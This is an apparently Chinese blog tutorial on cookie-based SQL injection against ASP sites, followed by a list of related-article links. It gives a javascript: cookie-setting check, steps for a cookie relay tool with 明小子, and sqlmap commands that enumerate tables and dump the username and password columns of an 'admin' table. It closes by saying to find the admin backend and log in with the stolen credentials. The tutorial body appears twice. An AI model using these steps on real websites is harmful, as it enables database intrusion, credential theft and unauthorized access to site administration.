cookie中转注入,使用sqlmap中转注入
2017-04-29 17:04
363 查看
一,判断是否有cookie注入:
目标网站http://www.xxx.com/x.asp?id=1
1.在IE浏览器访问去掉参数(id=1)的url: http://www.xxx.com/x.asp?(加载页面,显示不正常,原因是没有输参数)。
2.在IE浏览器输入javascript:alert(document.cookie="id="+escape("1"));(添加cookie信息),再次访问http://www.xxx.com/x.asp?(加载页面,显示正常)。此时这个网页就存在cookie注入,反之没有。
二,利用cookie中转注入:
使用的工具有: 手工注入辅助工具+明小子,Sqlmap。
手工注入辅助工具+明小子:
1.输入url,然后点击转到。如图
2.点击Cookie中转,之后会跳出一个新的url 如图
3.打开明小子,利用这个url。如图
4.开始检测 如图
2.利用Sqlmap Cookie注入:
1.命令:sqlmap.py –u”url” --cookie “参数” --level 2
注:例如目标网站为:http://www.xxx.com/x.asp?id=1,则sqlmap命令为sqlmap.py –u”http://www.xxx.com/x.asp” --cookie “id=1” --level 2
2.执行命令: sqlmap.py –u”url” --cookie “参数” --level 2 --tables(查所有表)如图
3.执行命令:sqlmap.py –u”url” --cookie“参数” --level 2 --tables --columns –T”admin”(查询列名)
4.执行命令: sqlmap.py –u”url” --cookie “参数” --level 2 --tables --dump –C”usernma,paasword” –T”admin”(查询字段)
OK,两种方法都可以使用。成功拿到帐号密码之后,接下就找后台管理登入进去,这里就不多介绍了。
目标网站http://www.xxx.com/x.asp?id=1
1.在IE浏览器访问去掉参数(id=1)的url: http://www.xxx.com/x.asp?(加载页面,显示不正常,原因是没有输参数)。
2.在IE浏览器输入javascript:alert(document.cookie="id="+escape("1"));(添加cookie信息),再次访问http://www.xxx.com/x.asp?(加载页面,显示正常)。此时这个网页就存在cookie注入,反之没有。
二,利用cookie中转注入:
使用的工具有: 手工注入辅助工具+明小子,Sqlmap。
手工注入辅助工具+明小子:
1.输入url,然后点击转到。如图
2.点击Cookie中转,之后会跳出一个新的url 如图
3.打开明小子,利用这个url。如图
4.开始检测 如图
2.利用Sqlmap Cookie注入:
1.命令:sqlmap.py –u”url” --cookie “参数” --level 2
注:例如目标网站为:http://www.xxx.com/x.asp?id=1,则sqlmap命令为sqlmap.py –u”http://www.xxx.com/x.asp” --cookie “id=1” --level 2
2.执行命令: sqlmap.py –u”url” --cookie “参数” --level 2 --tables(查所有表)如图
3.执行命令:sqlmap.py –u”url” --cookie“参数” --level 2 --tables --columns –T”admin”(查询列名)
4.执行命令: sqlmap.py –u”url” --cookie “参数” --level 2 --tables --dump –C”usernma,paasword” –T”admin”(查询字段)
OK,两种方法都可以使用。成功拿到帐号密码之后,接下就找后台管理登入进去,这里就不多介绍了。
相关文章推荐
- sqlmap使用post方法对cookie进行注入
- 使用sqlmap 代替access 注入中转
- SQLMAP渗透笔记之Cookie中转注入
- cookie中转注入
- 小迪教程第八天——注入工具sqlmap的使用
- cookie注入中转工具
- 使用sqlmap 绕过防火墙进行注入测试
- SQLMAP自动注入(一):sqlmap的简单使用和配合burpsuite使用
- IIS安全工具UrlScan介绍 ASP.NET 两种超强SQL 注入免费解决方案( 基于IIS,使用免费工具) 批改或隐藏IIS7.5的Server头信息 移除X-Powered-By,MVC,ASP.NET_SessionId 的 HTTP头或者cookie名称
- SQLMAP注入教程-11种常见SQLMAP使用方法详解
- (转载)使用sqlmap 绕过防火墙进行注入测试
- sqlmap注入使用教程
- sqlmap cookie注入实战
- cookie注入原理以及利用(cookie中转注入)
- 使用sqlmap 绕过防火墙进行注入测试
- 渗透测试:sqlmap伪静态注入与携带cookie登录认证注入
- 41. 注入篇——注入工具SQLmap使用
- 使用sqlmap 绕过防火墙进行注入测试
- kali攻防第7章补充 SQLMAP介绍之Cookie注入
- 【SQL注入/WAF】使用sqlmap 绕过防火墙进行注入测试